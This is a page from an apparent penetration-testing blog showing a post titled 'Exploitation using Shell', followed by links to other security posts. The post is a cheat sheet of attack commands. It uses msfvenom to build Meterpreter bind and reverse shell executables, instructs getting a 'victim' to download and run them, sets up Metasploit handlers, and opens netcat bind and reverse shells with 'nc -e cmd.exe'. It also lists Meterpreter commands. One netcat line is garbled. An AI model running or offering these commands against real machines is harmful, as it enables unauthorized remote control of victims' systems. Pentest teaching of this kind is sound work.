Posts

Showing posts with the label Shell

Exploitation using Shell

Image
Metasploit Framework Bind Shell msfvenom -p windows/meterpreter/bind_tcp -f exe > bindshell.exe Get victim to download and execute the file Ensure the victim execute the bind shell msfconsole use exploit/multi/handler set payload windows/meterpreter/bind_tcp set RHOST 192.168.66.101 exploit Hacker (192.168.66.102) initial the connection to victim machine on port 4444 Bind Shell using Netcat Victim nc -lvp 8099 -e cmd.exe Attacker nc -vn <victim_ip_address> 8099 Reverse Shell msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.66.102 -f exe > reverseshell.exe msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.66.102 exploit Victim (192.168.66.1) initial the connection to Hacker machine on port 4444 Reverse Shell using Netcat Victim nc -vn <attacker_ip_address18099 -e cmd.exe Attacker nc -lvp 8099 Exploitation using Meterpreter sysinfo screenshot ...

Popular posts from this blog

Remote Desktop Protocol (RDP) Security

Penetration Testing - Network

Damn Vulnerable Web Services (DVWS) - Walkthrough

Server Message Block (SMB) Security

Offensive Security Testing Guide

Host Configuration Assessment - Windows

Web Server Hardening - Apache Tomcat

Content Page

Mobile Penetration Testing - Android

Penetration Testing with OWASP Top 10 - 2017 A7 Cross-Site Scripting (XSS)